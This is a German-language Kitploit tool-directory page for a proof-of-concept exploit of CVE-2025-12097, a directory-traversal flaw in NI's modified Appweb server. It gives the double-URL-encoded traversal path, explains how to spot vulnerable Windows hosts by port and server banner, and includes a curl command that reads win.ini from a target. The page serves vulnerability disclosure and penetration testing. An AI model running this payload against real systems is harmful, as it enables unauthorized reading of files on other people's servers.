Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2025-12097 — Proof-of-Concept-Exploit für CVE-2025-12097, eine Directory-Traversal-Sicherheitslücke im NI-modifizierten Appweb-Server, die das Auslesen beliebiger Dateien auf Windows-Systemen ermöglicht. | Kitploit
Tools/GitHubGitHub/matejsmycka/poc-cve-2025-12097
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubmatejsmycka/poc-cve-2025-12097

PoC-CVE-2025-12097

Proof-of-Concept-Exploit für CVE-2025-12097, eine Directory-Traversal-Sicherheitslücke im NI-modifizierten Appweb-Server, die das Auslesen beliebiger Dateien auf Windows-Systemen ermöglicht.

Repository anzeigen
1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-12097

Beschreibung

Die NI-Modifikation des Appweb-Servers enthält eine Directory-Traversal-Schwachstelle, die es einem Angreifer ermöglicht, beliebige Dateien auf dem Server zu lesen.

Der URI-Pfad /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini wird umgewandelt in:

pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 was ein gültiger URI ist und Appweb diese Anfrage nicht blockiert. Dies wird dann an einen benutzerdefinierten Handler übergeben, der in diesem Fall den Inhalt jeder angeforderten Datei zurückgibt.

Aufgrund der Natur der betroffenen Software sind die betroffenen Geräte ausschließlich Microsoft Windows-Systeme.

Höchste beobachtete angreifbare Version: 12.0.0.

Identifizierung anfälliger Geräte

Die betroffenen Geräte können anhand der folgenden Merkmale identifiziert werden:

  • Nicht immer vorhanden, aber in den meisten Fällen läuft der Dienst auf Port 3580, andere Ports können 8080 und 80 umfassen.

Serverantwort auf /

root@kitploit:~
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126

<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>

PoC

Um diese Schwachstelle auszunutzen, können Sie den folgenden Befehl verwenden:

root@kitploit:~
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini

Sie sehen den Inhalt der Datei win.ini, wenn das Ziel angreifbar ist.

Tool herunterladen